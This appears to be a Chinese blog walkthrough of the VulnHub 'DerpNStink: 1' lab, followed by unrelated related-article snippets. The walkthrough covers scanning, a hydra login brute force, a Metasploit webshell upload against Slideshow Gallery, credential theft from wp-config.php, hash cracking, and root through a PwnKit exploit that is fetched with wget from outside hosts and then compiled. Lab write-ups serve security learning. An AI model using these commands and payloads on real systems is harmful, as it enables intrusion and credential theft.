当前位置: 首页 > news >正文

DerpNStink: 1靶场渗透

DerpNStink: 1

来自 <DerpNStink: 1 ~ VulnHub>

1,将两台虚拟机网络连接都改为NAT模式

2,攻击机上做namp局域网扫描发现靶机

nmap -sn 192.168.23.0/24

那么攻击机IP为192.168.23.182,靶场IP192.168.23.213

3,对靶机进行端口服务探测

nmap -sV -T4 -p- -A 192.168.23.213

4,首先访问80端口的web服务

查看页面源代码得到第一个flag

view-source:192.168.23.213

5,只是一个静态页面,那么接下来就需要枚举爆破其子目录

dirsearch -u http://192.168.23.213 -x 403,404

http://192.168.23.213/robots.txt

http://192.168.23.213/temporary/

6,网站的后端代码应该是PHP,数据库是mysql

dirsearch -u http://192.168.23.213/php -x 403,404

dirb http://192.168.23.213

/weblog下有东西,网站的CMS采用的是wordpress

使用whatweb扫描的之后正提示我们需要使用指定域名访问网站。浏览器的回显也可以证明

修改/etc/hosts即可

此时能够成功访问

7,然后再去扫描这个网站的子目录

dirsearch -u http://derpnstink.local/weblog/ -x 403,404

然后再使用wpscan进行框架漏洞扫描

 wpscan --url http://derpnstink.local/weblog/

1. 任意文件上传漏洞 (CVE-2014-5460)

  • 影响版本: < 1.4.7
  • 风险等级: 🔴 严重
  • 攻击向量: 未授权攻击者可上传恶意文件(如PHP webshell)。
  • 修复建议:
    • 立即升级至 1.4.7+
    • 禁用插件直至升级完成。
    • 检查wp-content/uploads/slideshow-gallery目录下是否有可疑文件。

2. 跨站脚本(XSS)与文件上传漏洞

  • 影响版本: Tribulant Slideshow Gallery < 1.5.3.4
  • 风险等级: 🔴 严重
  • 攻击向量: 结合XSS和文件上传实现远程代码执行。
  • 修复建议:
    • 升级至 1.5.3.4+
    • 审核所有用户输入字段(如标题、描述)的输入过滤逻辑。

3. 已认证XSS漏洞

  • 影响版本: <= 1.6.4
  • 风险等级: 🟠 高危
  • 攻击向量: 需低权限用户(如订阅者)触发XSS。
  • 修复建议:
    • 升级至 1.6.5+
    • 实施严格的Content-Security-Policy头。

4. 多重已认证XSS (CVE-2018-17946)

  • 影响版本: <= 1.6.5
  • 风险等级: 🟠 高危
  • 攻击向量: 管理员界面注入恶意脚本。
  • 修复建议:
    • 升级至 1.6.6+
    • 对所有输出内容进行HTML编码(如使用esc_html())。

5. XSS与SQL注入漏洞 (CVE-2018-18017~18019)

  • 影响版本: <= 1.6.8
  • 风险等级: 🔴 严重
  • 攻击向量: 通过参数污染实现数据库拖取或提权。
  • 修复建议:
    • 升级至 1.6.9+
    • 使用WAF拦截恶意SQL语句(如UNION SELECT)。

6. 管理员存储型XSS (CVE-2021-24882)

  • 影响版本: < 1.7.4
  • 风险等级: 🟠 高危
  • 攻击向量: 管理员账户劫持。
  • 修复建议:
    • 升级至 1.7.4+
    • 限制管理员编辑器的JavaScript执行权限。

7. 未授权敏感信息泄露 (CVE-2024-31353)

  • 影响版本: < 1.8.1
  • 风险等级: 🟠 高危
  • 攻击向量: 暴露数据库凭据或API密钥。
  • 修复建议:
    • 升级至 1.8.1+
    • 检查.env或wp-config.php是否被公开访问。

8. CSRF导致设置重置 (CVE-2024-31354)

  • 影响版本: < 1.7.9
  • 风险等级: 🟡 中危
  • 攻击向量: 诱骗管理员点击恶意链接。
  • 修复建议:
    • 升级至 1.7.9+
    • 添加反CSRF令牌至所有表单。

9. 贡献者权限SQL注入 (CVE-2024-31355)

  • 影响版本: < 1.7.9
  • 风险等级: 🔴 严重
  • 攻击向量: 低权限用户执行任意SQL查询。
  • 修复建议:
    • 升级至 1.7.9+
    • 使用$wpdb->prepare()预处理所有SQL语句。

10. 已认证SQL注入 (CVE-2024-5543)

  • 影响版本: LITE < 1.8.2
  • 风险等级: 🔴 严重
  • 攻击向量: 通过参数注入提取用户数据。
  • 修复建议:
    • 升级至 1.8.2+
    • 启用数据库审计日志监控异常查询。

11. 管理员存储型XSS (CVE-2024-47376)

  • 影响版本: < 1.8.4
  • 风险等级: 🟠 高危
  • 攻击向量: 劫持管理员会话。
  • 修复建议:
    • 升级至 1.8.4+
    • 启用浏览器XSS过滤器(如X-XSS-Protection头)。

8,弱口令爆破出网站的登陆密码为admin/admin

hydra  -l admin -P /usr/share/wordlists/rockyou.txt -vV   derpnstink.local- http-post-form "/weblog/wp-login.php:log=^USER^&pwd=^PASS^:error"

9,登录成功

利用刚才wpscan扫出来Slideshow Gallery存在的漏洞。因为我们知道后台的账户密码,这里使用msf来进行getshell操作

msfconsole

search slideshow

use 4

show options

set rhosts 192.168.23.213

set targeturi /weblog/        

set wp_user admin

set wp_password admin

run

最后成功getshell

Metasploit模块分析:exploit/unix/webapp/wp_slideshowgallery_upload

1. 模块功能概述

  • 漏洞类型: WordPress插件Slideshow Gallery的认证文件上传漏洞(CVE-2014-5460)。
  • 攻击目标: 允许已登录用户上传恶意PHP文件至服务器,执行任意代码。
  • 利用条件:
    • WordPress安装Slideshow Gallery插件且版本<1.4.7。
    • 攻击者需拥有有效用户凭证(至少作者/贡献者权限)。
  • Payload: 通常为反向Shell或Webshell,用于获取服务器控制权。

2. 漏洞技术原理

  • 漏洞点: 插件的文件上传功能未对文件类型、内容做严格校验。
    • 错误实现: 仅依赖客户端MIME类型检查(如image/jpeg),未在服务端验证文件内容。
    • 恶意绕过: 将PHP文件伪装成图片(如shell.php.jpg),利用插件解析漏洞触发代码执行。
  • 关键代码路径:
    // 伪代码示例:插件上传处理逻辑

if ($_FILES['file']['type'] == 'image/jpeg') {
    move_uploaded_file($_FILES['file']['tmp_name'], $target_path); // 未校验实际文件内容
}

3. 模块工作流程

  1. 认证阶段:
    • 使用提供的用户名密码登录WordPress后台,获取wp-admin的Cookies。
    • 发送POST请求至/wp-login.php,维持会话状态。
  2. 漏洞利用:
    • 构造multipart/form-data请求,向插件上传接口(如/wp-admin/admin-ajax.php)发送恶意文件。
    • 使用随机文件名绕过黑名单过滤(如rNd0m.php)。
    • 植入Payload(如<?php system($_GET['cmd']); ?>)。
  3. 触发执行:
    • 访问上传的恶意文件路径(如/wp-content/uploads/slideshow-gallery/rNd0m.php)。
    • 通过GET/POST参数传递命令,实现远程代码执行(RCE)。

4. 模块关键代码解析(简化版)

# Metasploit模块核心代码逻辑
def exploit
  # 1. 登录WordPress
  res = send_request_cgi({
    'method' => 'POST',
    'uri' => wordpress_url_login,
    'vars_post' => {
      'log' => datastore['USERNAME'],
      'pwd' => datastore['PASSWORD']
    }
  })
  # 2. 上传恶意PHP文件
  payload_name = "#{rand_text_alpha(5)}.php"
  post_data = Rex::MIME::Message.new
  post_data.add_part('upload', nil, nil, 'form-data; name="action"')
  post_data.add_part(payload.encoded, 'application/x-php', 'binary', "form-data; name=\"file\"; filename=\"#{payload_name}\"")
  send_request_cgi({
    'method' => 'POST',
    'uri' => wordpress_url_admin_ajax,
    'cookie' => cookies,
    'data' => post_data.to_s,
    'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
  })
  # 3. 触发Payload
  send_request_cgi({
    'uri' => "#{upload_path}/#{payload_name}",
    'method' => 'GET'
  })
end

5. 防御与检测建议

  • 修复措施:
    • 升级插件至1.4.7+,修复文件类型验证逻辑。
    • 在服务器端使用finfo_file()检测文件真实类型,而非依赖客户端提交的MIME。
  • 安全加固:

// 安全文件上传示例代码
$file_info = new finfo(FILEINFO_MIME_TYPE);
$mime_type = $file_info->file($_FILES['file']['tmp_name']);
if (!in_array($mime_type, ['image/jpeg', 'image/png'])) {
    die("Invalid file type.");
}

  • 入侵检测:
    • 监控/wp-content/uploads/slideshow-gallery/目录下的非图片文件。
    • 分析Web日志中异常的admin-ajax.php请求,特别是包含php文件名和cmd参数的活动。

6. 渗透测试中的应用场景

  • 红队演练: 通过钓鱼获取低权限账户后,利用此模块横向渗透至服务器。
  • 漏洞验证: 在授权测试中快速验证未修复的Slideshow Gallery漏洞。
  • 权限提升: 结合其他漏洞(如XSS劫持管理员会话),实现从低权限到RCE的完整攻击链。

10,用python将shell转变为交互式的shell

shell

python -c 'import pty;pty.spawn("/bin/bash")'

11,因为知道网站的CMS是wordpress,那么网站配置文件wp-confog.php一般都会泄露数据库账户密码

cd /var/www/html/weblog

ls

cat wp-config.php

然后进行mysql登录操作

查看数据库 show databases;

使用数据库 use

查看数据库表 show tables;

然后就能在wp-posts数据表下得到flag2

然后在wp_users有两个账号密码

unclestinky:$P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41

admin:$P$BgnU3VLAv.RWd3rdrkfVIuQr6mFvpd/

12,然后讲密码写入一个txt,然后在使用john进行拆解爆破

vim user_pass.txt

cat user_pass.txt

john --wordlist=/usr/share/wordlists/rockyou.txt user_pass.txt

爆破成功:

admin/admin           

unclestinky/wedgie57        

13,信息收集在home目录下发现用户

尝试切换到stinky用户,密码wedgie57

(只能横向移动,无法ssh直接登录)

切换成功,然后得到了第三个flag

14,提权,首先查看ubantu的版本

searchsploit ubuntu Local Privilege Escalation |grep 14

这里就使用41762.txt

15,提权开始,首先下载exp脚本

wget http://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/CreateSetgidBinary.c
wget http://www.halfdog.net/Misc/Utils/UserNamespaceExec.c
wget http://www.halfdog.net/Misc/Utils/SuidExec.c

# 编译组件
gcc -o CreateSetgidBinary CreateSetgidBinary.c
gcc -o UserNamespaceExec UserNamespaceExec.c
gcc -o SuidExec SuidExec.c


内部进程获得伪root权限,映射当前用户UID/GID到命名空间内的0(root)

./UserNamespaceExec -- /bin/bash 

权限依然是不够的

mkdir mnt test work
# Ubuntu Trusty错误
mount -t overlayfs -o lowerdir=/var,upperdir=test overlayfs mnt
# Ubuntu Wily正确
mount -t overlay -o lowerdir=/var,upperdir=test,workdir=work overlayfs mnt


启用SGID并全局可写

mkdir -p test/mail work

chmod 02777 mnt/mail

卸载后权限污染保留在upperdir

umount mnt 

允许测试用户写入

setfacl -d -m u:test:rwx test
利用/bin/mount的SUID特性注入ELF代码(suidExecMinimalElf)

./CreateSetgidBinary test/mail/escalate /bin/mount x nonexistent-arg

获得mail组权限
test/mail/escalate ./SuidExec /bin/bash 
验证文件属组

touch x 

那么只能换一种方式进行提权

16,第二种方式进行提权,去github copy公开的exp

git clone GitHub - arthepsy/CVE-2021-4034: PoC for PwnKit: Local Privilege Escalation Vulnerability in polkit’s pkexec (CVE-2021-4034)

然后kali开启一个http服务

wget http://192.168.23.182:8000/cve-2021-4034-poc.c

chmod +x cve-2021-4034-poc.c

gcc -pthread cve-2021-4034-poc.c -o cve-2021-4034-poc -lcrypt

执行文件,成功提权变成root

./cve-2021-4034-poc

相关文章:

DerpNStink: 1靶场渗透

DerpNStink: 1 来自 <DerpNStink: 1 ~ VulnHub> 1&#xff0c;将两台虚拟机网络连接都改为NAT模式 2&#xff0c;攻击机上做namp局域网扫描发现靶机 nmap -sn 192.168.23.0/24 那么攻击机IP为192.168.23.182&#xff0c;靶场IP192.168.23.213 3&#xff0c;对靶机进行端…...

apache安装脚本使用shell建立

注意防火墙&#xff0c;yum&#xff0c;网络连接等 以下是具体的apache安装脚本 #!/bin/bash # Set Apache version to install ## author: yuan # 检查外网连接 echo "检查外网连接..." ping www.baidu.com -c 3 > /dev/null 2>&1 if [ $? -eq 0 ]; …...

Azure SDK 使用指南

​Azure SDK&#xff08;软件开发工具包&#xff09;是一组由微软提供的工具和库&#xff0c;旨在帮助开发者以多种编程语言&#xff08;如 .NET、Java、Python、JavaScript 等&#xff09;与 Azure 服务进行交互。 ​通过使用 Azure SDK&#xff0c;开发者可以更高效地构建、部…...

DeepSeek-V3-0324 版本升级概要

DeepSeek-V3-0324 魔搭社区汇聚各领域最先进的机器学习模型&#xff0c;提供模型探索体验、推理、训练、部署和应用的一站式服务。https://modelscope.cn/models/deepseek-ai/DeepSeek-V3-0324 发布背景与改进 根DeepSeek-V3-0324 展示了以下关键改进&#xff1a; 推理性能提…...

leetcode 150. 逆波兰表达式求值

150. 逆波兰表达式求值 - 力扣&#xff08;LeetCode&#xff09; class Solution:def evalRPN(self, tokens: List[str]) -> int:stack[]for item in tokens:if item not in ( ,-,* , / ):stack.append(item)else:preint(stack.pop())pre_beforeint(stack.pop())sign itemi…...

LangChain4j与DashScope深度集成实战:一站式开发指南

本篇文章会通篇详细的讲清楚LangChain4j与DashScope集成的各个方面&#xff0c;从Springboot的集成到Ai对话、会话记忆、RAG、FunctionCalling、互联网搜索、结构化的输出、多模态等都给出相应的说明&#xff0c;希望通过这篇文章对于LLM不了解的同仁一样可以扩展出自己的AI应用…...

逼用户升级Win11,微软开始给Win10限速

随着Windows10的支持时间越来越短&#xff0c;微软也加大了对Win10用户的驱赶力度。 最近&#xff0c;微软官宣了将要在今年6月份降低OneNote for Windows 10的同步速度。软件也将和Windows10在今年的10月14日一同停止支持和维护。 这将影响实时协作和多设备访问。 对OneNote…...

工作流引擎Flowable介绍及SpringBoot整合使用实例

Flowable简介 Flowable 是一个轻量级的业务流程管理&#xff08;BPM&#xff09;和工作流引擎&#xff0c;基于 Activiti 项目发展而来&#xff0c;专注于提供高性能、可扩展的工作流解决方案。它主要用于企业级应用中的流程自动化、任务管理和审批流等场景。 Flowable 的核心…...

推荐一个可以自定义github主页的网站

一、简介 Profile Readme Generator 是一个开源工具&#xff0c;可以帮助你快速创建个性化的 GitHub 个人简介&#xff08;README&#xff09;。它支持自定义内容和样式&#xff0c;让你的 GitHub 个人主页更加美观和专业。 二、使用步骤 &#xff08;一&#xff09;访问网站…...

【R语言可视化】相关系数热图

目录 热图无显著性 结果展示01&#xff1a; 热图显著性 结果展示02&#xff1a; ggplot2绘制三角热图 结果展示03&#xff1a; corrplot绘制三角热图 结果展示04: 热图无显著性 # 示例数据 data(mtcars) df <- mtcars# 计算相关矩阵 cor_matrix <- round(cor(df…...

【区块链 + 文化版权】文创链 | FISCO BCOS 应用案例

“文创链”是由四川省区块链行业协会、成都音像出版社有限公司共同发起&#xff0c; 由成都九天星空科技有限公司等联合打造的数字文创领域联盟链。平台采用FISCO BCOS 开源底层框架&#xff0c; 为数字文创产业构建一个高效、透明、可信的版权管理与交易平台。 平台专注于数字…...

# 使用自定义Shell脚本hello快速配置Linux用户账户

使用自定义Shell脚本快速配置Linux用户账户 在学校实验室管理Linux服务器&#xff0c;或者公司小团队管理服务器时&#xff0c;大家需要一个能隔离自己服务&#xff0c;但是自己又需要对服务器的完整权限的情形。创建和配置用户账户是一项常见但繁琐的任务。特别是当你需要频繁…...

PyTorch中的Tensor

PyTorch中的Tensor‌ 是核心数据结构&#xff0c;类似于 NumPy 的多维数组&#xff0c;但具备 GPU 加速和自动求导等深度学习特性。 一、基本概念 ‌核心数据结构‌ Tensor 是存储和操作数据的基础单元&#xff0c;支持标量&#xff08;0D&#xff09;、向量&#xff08;1D&am…...

16-CSS3新增选择器

知识目标 掌握属性选择器的使用掌握关系选择器的使用掌握结构化伪类选择器的使用掌握伪元素选择器的使用 如何减少文档内class属性和id属性的定义&#xff0c;使文档变得更加简洁&#xff1f; 可以通过属性选择器、关系选择器、结构化伪类选择器、伪元素选择器。 1. 属性选择…...

关于笔记本电脑突然没有wifi图标解决方案

笔记本电脑突然没有wifi图标解决方案&#xff0c;设置里也看不见wifi&#xff0c;电脑突然就连不网络了 解决方案&#xff1a; 我的电脑——>管理——>服务和应用程序——>服务——>找到WLAN AutoConfig——>点击启动就好了...

Pytorch学习笔记(七)Learn the Basics - Optimizing Model Parameters

这篇博客瞄准的是 pytorch 官方教程中 Learn the Basics 章节的 Optimizing Model Parameters 部分。 官网链接&#xff1a;https://pytorch.org/tutorials/beginner/basics/optimization_tutorial.html 完整网盘链接: https://pan.baidu.com/s/1L9PVZ-KRDGVER-AJnXOvlQ?pwd…...

数据可视化TensorboardX和tensorBoard安装及使用

tensorBoard 和TensorboardX 安装及使用指南 tensorBoard 和 TensorBoardX 是用于可视化机器学习实验和模型训练过程的工具。TensorBoard 是 TensorFlow 官方提供的可视化工具&#xff0c;而 TensorBoardX 是其社区驱动的替代品&#xff0c;支持 PyTorch 等其他框架。以下是它…...

工业4G路由器赋能智慧停车场高效管理

工业4G路由器作为智慧停车场管理系统通信核心&#xff0c;将停车场内的各个子系统连接起来&#xff0c;包括车牌识别系统、道闸控制系统、车位检测系统、收费系统以及监控系统等。通过4G网络&#xff0c;将这些系统采集到的数据传输到云端服务器或管理中心&#xff0c;实现信息…...

深度学习1—Python基础

深度学习1—python基础 你的第一个程序 print(hello world and hello deep learning!)基本数据结构 空值 (None)&#xff1a;在 Python 中&#xff0c;None 是一个特殊的对象&#xff0c;用于表示空值或缺失的值。它不同于数字 0&#xff0c;因为 0 是一个有意义的数字&#…...

数据结构十三、set map

一、set 1、size / empty size&#xff1a;返回set中实际元素的个数 empty&#xff1a;判断set是否为空 2、begin / end 这是两个迭代器&#xff0c;因此可以使用范围for来遍历整个红黑树。其中&#xff0c;遍历是按照中序遍历的顺序&#xff0c;因此是一个有序序列。 3、in…...

【大模型基础_毛玉仁】3.5 Prompt相关应用

目录 3.5 相关应用3.5.1 基于大语言模型的Agent3.5.2 数据合成3.5.3 Text-to-SQL3.5.4 GPTs 3.5 相关应用 Prompt工程应用广泛&#xff0c;能提升大语言模型处理基础及复杂任务的能力&#xff0c;在构建Agent、数据合成、Text-to-SQL转换和设计个性化GPTs等方面不可或缺。 . …...

自动驾驶VLA模型技术解析与模型设计

1.前言 2025年被称为“VLA上车元年”&#xff0c;以视觉语言动作模型&#xff08;Vision-Language-Action Model, VLA&#xff09;为核心的技术范式正在重塑智能驾驶行业。VLA不仅融合了视觉语言模型&#xff08;VLM&#xff09;的感知能力和端到端模型的决策能力&#xff0c;…...

【AI】Orin NX+ubuntu22.04上移植YoloV11,并使用DeepStream测试成功

【AI】郭老二博文之:AI学习目录汇总 1、烧写系统 新到的开发板,已经烧写好Ubuntu系统,版本为22.04。 如果没有升级到Ubuntu22.04,可以在电脑Ubuntu系统中使用SDKManager来烧写Ubuntu系统,网络情况好的话,也可以直接将CUDA、cuDNN、TensorRT、Deepstream等也安装上。 2…...

vscode 通过Remote-ssh远程连接服务器报错 could not establish connection to ubuntu

vscode 通过Remote-ssh插件远程连接服务器报错 could not establish connection to ubuntu&#xff0c;并且出现下面的错误打印&#xff1a; [21:00:57.307] Log Level: 2 [21:00:57.350] SSH Resolver called for "ssh-remoteubuntu", attempt 1 [21:00:57.359] r…...

ESP32S3 WIFI 实现TCP服务器和静态IP

一、 TCP服务器代码 代码由station_example_main的官方例程修改 /* WiFi station ExampleThis example code is in the Public Domain (or CC0 licensed, at your option.)Unless required by applicable law or agreed to in writing, thissoftware is distributed on an &q…...

第三课:Stable Diffusion图生图入门及应用

文章目录 Part01 图生图原理Part02 图生图基本流程Part03 随机种子作用解析Part04 图生图的拓展应用 Part01 图生图原理 当提示词不能足够表达用户需求的时候&#xff0c;加入图片能让AI更好的理解你的想法图片上的像素信息会在加噪和去噪的过程中&#xff0c;作为一种特征反映…...

蓝桥与力扣刷题(蓝桥 蓝桥骑士)

题目&#xff1a;小明是蓝桥王国的骑士&#xff0c;他喜欢不断突破自我。 这天蓝桥国王给他安排了 N 个对手&#xff0c;他们的战力值分别为 a1,a2,...,an&#xff0c;且按顺序阻挡在小明的前方。对于这些对手小明可以选择挑战&#xff0c;也可以选择避战。 身为高傲的骑士&a…...

Photoshop怎样保存为ico格式

1. 打开图像 开启 Photoshop 软件&#xff0c;选择 “文件” 菜单&#xff0c;点击 “打开” 选项&#xff0c;然后找到你想要保存为 ICO 格式的图像文件并打开。 2. 调整图像大小&#xff08;可选&#xff09; ICO 图标通常有特定尺寸要求&#xff0c;你可以根据需求调整图像…...

Ubuntu xinference部署本地模型bge-large-zh-v1.5、bge-reranker-v2-m3

bge-large-zh-v1.5 下载模型到指定路径&#xff1a; modelscope download --model BAAI/bge-large-zh-v1.5 --local_dir ./bge-large-zh-v1.5自定义 embedding 模型&#xff0c;custom-bge-large-zh-v1.5.json&#xff1a; {"model_name": "custom-bge-large…...

python笔记之判断月份有多少天

1、通过随机数作为目标月份 import random month random.randint(1,12)2、判断对应的年份是闰年还是平年 因为2月这个特殊月份&#xff0c;闰年有29天&#xff0c;而平年是28天&#xff0c;所以需要判断对应的年份属于闰年还是平年&#xff0c;代码如下 # 判断年份是闰年还…...

Kotlin泛型: 协变|逆变|不变

引言 无论java 通配符上限还是下限&#xff0c;都多少存在缺陷&#xff0c;要么存不安全&#xff0c;要么取不安全。而kotlin就解决这个问题。让out 纯输出&#xff0c; 让in纯输入。 java这块知识&#xff1a; java泛型的协变、逆变和不变-CSDN博客 协变 生产者out T 协变…...

高斯数据库的空分区的查看和清理

在 高斯数据库&#xff08;GaussDB&#xff09; 中&#xff0c;分区表是一种常见的表设计方式&#xff0c;用于优化大数据的查询性能。 一、空分区的影响&#xff1a; 存储空间占用 元数据开销&#xff1a;即使分区中没有数据&#xff0c;数据库仍然需要维护分区的元数据&…...

word使用自带的公式

文章目录 Word公式中word公式快捷键&#xff1a;word2016公式框输入多行word 公式加入空格&#xff1a;word公式如何输入矩阵:公式图片转为Latex语法word 能直接输入 latex 公式么word公式中有的是斜体有的不是 word文本中将文字转为上标的快捷键 Tips几个好用的网站&#xff1…...

Linux系统-ls命令

一、ls命令的定义 Linux ls命令&#xff08;英文全拼&#xff1a;list directory contents&#xff09;用于显示指定工作目录下之内容&#xff08;列出目前工作目录所含的文件及子目录)。 二、ls命令的语法 ls [选项] [目录或文件名] ls [-alrtAFR] [name...] 三、参数[选项…...

数据结构:利用递推式计算next表

next 表是 KMP 算法的核心内容&#xff0c;下面介绍一种计算 next 表的方法&#xff1a;利用递推式计算 如图 6.3.1 所示&#xff0c;在某一趟匹配中&#xff0c;当对比到最后一个字符的时候&#xff0c;发现匹配失败&#xff08;s[i] ≠ t[j]&#xff09;。根据 BF 算法&…...

Git操作

1 git init 项目初始化&#xff08;init&#xff09;成仓库 2、git add 管理文件 3、git commit -m <message> 告诉Git&#xff0c;把文件提交到仓库 4、git status 查看当前管理文件的状态&#xff0c;命令 5、git log 查看提交&#xff08;commit&#xff09;的…...

什么是快重传

原理&#xff1a; 在TCP连接中&#xff0c;接受方会对收到的数据包发送确认&#xff08;ACK&#xff09;。如果接受方收到一个乱序的数据包&#xff08;即期望的下一个数据包尚未到达&#xff09;&#xff0c;它会重复发送对上一个已成功接受的数据包的确认。 当发送方连续收…...

计算机网络——物理层设备

目录 ​编辑 中继器 集线器&#xff08;Hub&#xff09; 集线器&#xff0c;中继器的一些特性 集线器和中继器不能“无限串联” 集线器连接的网络&#xff0c;物理上是星型拓扑&#xff0c;逻辑上是总线型拓扑 集线器连接的各网段会“共享带宽” 中继器 如果我们想要网络…...

CSS 预处理器

在面试中回答关于 CSS 预处理器的问题时&#xff0c;你可以从以下几个方面进行回答&#xff0c;展示你的知识深度和实践经验&#xff1a; 1. 什么是 CSS 预处理器&#xff1f; 你可以从定义和目的入手&#xff1a; “CSS 预处理器是一种扩展 CSS 功能的工具&#xff0c;它允许…...

解锁智能制造新体验:兰亭妙微 UE/UI 设计赋能行业变革

在智能制造时代的滚滚浪潮中&#xff0c;企业的数字化转型不仅是技术的革新&#xff0c;更是用户体验与交互界面的全面升级。然而&#xff0c;许多制造企业在这一转型过程中&#xff0c;面临着一系列 UI/UE 设计难题&#xff0c;严重阻碍了企业的数字化发展进程。兰亭妙微凭借专…...

计算机网络高频(三)UDP基础

计算机网络高频(三)UDP基础 1.UDP的头部格式是什么样的?⭐ UDP 头部具有以下字段: 源端口(Source Port):16 位字段,表示发送方的端口号。目标端口(Destination Port):16 位字段,表示接收方的端口号。长度(Length):16 位字段,表示 UDP 数据报(包括头部和数据部…...

Oracle数据库服务器地址变更与监听配置修改完整指南

一、前言 在企业IT运维中&#xff0c;Oracle数据库服务器地址变更是常见的运维操作。本文将详细介绍如何安全、高效地完成Oracle数据库服务器地址变更及相关的监听配置修改工作&#xff0c;确保数据库服务在迁移后能够正常运行。 二、准备工作 1. 环境检查 确认新旧服务器I…...

获取1688.item_password接口:解析淘口令真实URL

一、接口介绍 1688的item_password接口主要用于将1688平台的淘口令短链接转换为实际商品链接。它基于1688平台的后台数据和规则&#xff0c;对用户传入的淘口令进行解析和验证&#xff0c;通过相应的算法和数据匹配&#xff0c;找到对应的商品信息&#xff0c;并生成可直接访问…...

计算机网络的分类及其性能指标

一. 计算机网络的分类 1. 按分布范围分类 广域网&#xff08;WAN&#xff09; 也称远程网。广域网提供长距离通信&#xff0c;通常是几十千米到几千千米的区域&#xff0c;比如跨国通信。连接广域网的各结点交换机的链路一般是高速链路&#xff0c;具有较大的通信容量城域网&…...

Redis原理:watch命令

在前面的文章中有提到&#xff0c;在multi 前可以通过watch 来观察哪些key&#xff0c;被观察的这些key&#xff0c;会被redis服务器监控&#xff0c;涉及该key被修改时&#xff0c;则在exec 命令执行过程中会被识别出来&#xff0c;exec 就不会再执行命令。 源码分析 // 监控…...

微服务中的服务发现与注册中心

在微服务架构中&#xff0c;服务实例的数量可能随着流量负载自动扩展或缩减&#xff0c;因此服务之间如何高效地进行通信成为一个重要问题。本篇博客将介绍服务发现的概念&#xff0c;并结合 Consul 和 自定义注册中心 进行实践&#xff0c;帮助开发者在微服务架构下高效管理服…...

Flutter网络请求封装:高效、灵活、易用的Dio工具类

在Flutter开发中&#xff0c;网络请求是必不可少的功能。为了简化代码、提高开发效率&#xff0c;我们通常会封装一个网络请求工具类。本文基于Dio库&#xff0c;详细介绍如何封装一个高效、灵活、易用的网络请求工具类&#xff0c;支持以下功能&#xff1a; 单例模式&#xf…...

Axure项目实战:智慧城市APP(三)教育查询(显示与隐藏交互)

亲爱的小伙伴&#xff0c;在您浏览之前&#xff0c;烦请关注一下&#xff0c;在此深表感谢&#xff01; 课程主题&#xff1a;教育查询 主要内容&#xff1a;教育公告信息&#xff0c;小升初、初升高、高考成绩查询&#xff1b;教育公告信息为传统的信息页面&#xff0c;小升…...

案例实践 | 招商局集团以长安链构建“基于DID的航运贸易数据资产目录链”

概览 案例名称 基于DID的航运贸易数据资产目录链 业主单位 招商局集团 上线时间 2024年10月 用户群体 供数用数企业和个人 用户规模 集团内20企业 案例背景 招商局集团深入落实“促进数据高效流通使用、赋能实体经济”精神&#xff0c;深化集团数字化水平&#xff0c…...

计算机网络入门:物理层与数据链路层详解

&#x1f310; &#xff08;专业解析 中学生也能懂&#xff01;&#xff09; &#x1f4d6; 前言 计算机网络就像数字世界的“高速公路系统”&#xff0c;而物理层和数据链路层是这条公路的基石。本文用 专业视角 和 生活化比喻 &#xff0c;带你轻松理解这两层的核心原理&a…...